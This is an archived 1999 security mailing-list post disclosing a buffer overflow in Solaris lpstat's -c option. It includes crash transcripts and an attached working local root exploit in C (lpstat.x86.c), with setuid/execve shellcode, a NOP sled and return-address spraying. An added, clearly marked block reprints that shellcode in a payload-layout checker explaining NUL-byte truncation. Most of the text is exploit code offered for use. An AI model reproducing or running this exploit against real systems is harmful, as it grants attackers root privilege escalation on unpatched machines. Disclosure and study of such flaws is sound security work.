On Aug/25/98 Sun released the following patches for lp:

  Solaris 2.6 Sparc: 106235-02
  Solaris 2.6 x86:   106236

It is quite sad that they did not fix another overflow in /usr/bin/lpstat. I verified this bug on both Solaris 2.7 x86 and 2.6 Sparc; I assume that it is also present on Solaris 2.6 x86 and 2.7 Sparc.

Solaris 2.7 x86

% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
% UX:lpstat: ERROR: Class [...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
% not exist.
%         TO FIX: Use the "lpstat -c all" command to list
%                 all known classes.
% Segmentation Fault
% plasmoid@gorkie:foo>

Solaris 2.6 Sparc

% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
% UX:lpstat: ERROR: Class [...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
% exist.
%         TO FIX: Use the "lpstat -c all" command to list
%                 all known classes.
% Segmentation Fault
% plasmoid@bock:foo>

This overflow is definitely exploitable; I attached the exploit for Solaris x86. Quality patches for all Solaris versions can be obtained from www.hert.org, a fast security source.
plasmoid
deep/thc/clb
http://thc.inferno.tusculum.edu

Attachment: lpstat.x86.c

/*
 * lpstat sploit for solaris 2.6/2.7
 * by plasmoid/deep/thc <plasmoid@pimmel.com> (c) 1999
 * supported by insected and wilkins
 *
 * THC - The Hacker's Choice
 * http://thc.inferno.tusculum.edu
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Solaris x86 shellcode: seteuid(0), setuid(0), execve("/bin/sh").
   System calls go through the lcall $7,$0 gate; its zero bytes, the
   terminator of "/bin/sh" and the argv[] NULL are stored as 0xff and
   patched to 0x00 at run time so the payload survives as a C string. */
char shell[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

const int buffersize = 1100;   /* payload passed as the -c class name */
const char x86_nop = 0x90;
long nop, esp;
long offset = 0;
char buffer[2000];             /* global, so the payload is NUL-terminated */

/* returns the caller's stack pointer in %eax (gcc on 32-bit x86) */
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int argc, char *argv[]) {
    int i;

    /* you shouldn't need to edit the offset: we run with
       800 NOPs in an 1100-byte buffer, so one of those
       NOPs should be hit */

    if (argc > 1) offset = strtol(argv[1], NULL, 0);

    /* if you don't succeed, modify the NOP count;
       the standard value of 801 bytes is quite
       strange enough */

    if (argc > 2) nop = strtoul(argv[2], NULL, 0);
    else
        nop = 801;

    esp = get_esp();

    /* layout: NOP sled | shellcode | return address repeated
       every 4 bytes up to the end of the buffer */
    memset(buffer, x86_nop, buffersize);
    memcpy(buffer + nop, shell, strlen(shell));
    for (i = nop + strlen(shell); i < buffersize - 4; i += 4)
        *((int *) &buffer[i]) = esp + offset;

    execl("/usr/bin/lpstat", "lpstat", "-c", buffer, NULL);

    printf("exec failed!\n");
    return 0;
}
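Added example (not part of plasmoid's post or of the THC exploit): the payload reaches lpstat as an argv string, so the target copies it only up to the first 0x00 byte. The block below rebuilds the same layout (1100 bytes, 801 NOPs, the attachment's shellcode, 4-byte return-address slots) around a caller-supplied return address and reports how much of it a C-string copy would actually pick up. The two addresses in main() are constructed stand-ins for esp+offset, not values from the post; the second one has a zero low byte and shows the payload being cut off at the first return slot.

```c
/* Added example (not part of plasmoid's post or the THC exploit): sanity
 * checks for an overflow payload that reaches the target through argv.
 * lpstat copies the class name as a C string, so the whole payload has
 * to be free of 0x00 bytes up to its final terminator, and every
 * return-address slot has to be free of them too.  Layout constants are
 * the post's (1100-byte buffer, 801 NOPs, 4-byte slots); the return
 * addresses in main() are constructed stand-ins for esp+offset. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 1100
#define NOPS    801
#define X86_NOP 0x90

/* Shellcode copied from the attachment lpstat.x86.c.  The 0xff bytes are
 * placeholders for zeros that the code writes itself at run time. */
static const unsigned char shell[] =
    "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
    "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
    "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
    "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
    "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
    "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
#define SHELL_LEN (sizeof(shell) - 1)

/* Where the payload is built; one extra byte for the terminator. */
static unsigned char payload[BUFSIZE + 1];

typedef struct {
    size_t copied;    /* bytes strlen() sees: what a strcpy-style target copies */
    size_t slots;     /* return-address slots written after the shellcode */
    long   first_nul; /* offset of the first embedded 0x00 in the 1100 bytes, or -1 */
} payload_info;

/* Index of the first 0x00 in p[0..n), or -1 if there is none. */
long find_nul(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return (long)i;
    return -1;
}

/* Fills `payload` the way the exploit does (NOP sled, shellcode, then the
 * return address repeated in 4-byte steps) and reports what the target
 * would actually receive.  The loop bound mirrors the original, which
 * leaves the last four bytes of the buffer as NOPs. */
payload_info layout(uint32_t ret)
{
    payload_info info = {0, 0, -1};
    memset(payload, X86_NOP, BUFSIZE);
    memcpy(payload + NOPS, shell, SHELL_LEN);
    for (size_t i = NOPS + SHELL_LEN; i < (size_t)(BUFSIZE - 4); i += 4) {
        /* little-endian, as the 32-bit x86 target reads it */
        payload[i]     = (unsigned char)(ret & 0xff);
        payload[i + 1] = (unsigned char)((ret >> 8) & 0xff);
        payload[i + 2] = (unsigned char)((ret >> 16) & 0xff);
        payload[i + 3] = (unsigned char)((ret >> 24) & 0xff);
        info.slots++;
    }
    payload[BUFSIZE] = '\0';
    info.first_nul = find_nul(payload, BUFSIZE);
    info.copied = strlen((const char *)payload);
    return info;
}

int main(void)
{
    /* constructed stand-ins for esp+offset: the second has a zero low byte */
    const uint32_t addrs[] = { 0x08047a50u, 0x08047a00u };
    printf("shellcode: %zu bytes, first NUL at %ld\n",
           (size_t)SHELL_LEN, find_nul(shell, SHELL_LEN));
    for (size_t k = 0; k < 2; k++) {
        payload_info in = layout(addrs[k]);
        printf("ret=0x%08x: copied %zu of %d bytes, %zu slots, first NUL at %ld\n",
               addrs[k], in.copied, BUFSIZE, in.slots, in.first_nul);
    }
    return 0;
}
```

The program only inspects bytes, so it builds and runs on any host; it does not need Solaris. A zero byte anywhere in the chosen return address truncates the string before the first slot, leaving the sled and shellcode in place but no overwritten return address, which is the same reason the shellcode keeps its own zeros as 0xff and patches them in at run time.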
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:31:15 PDT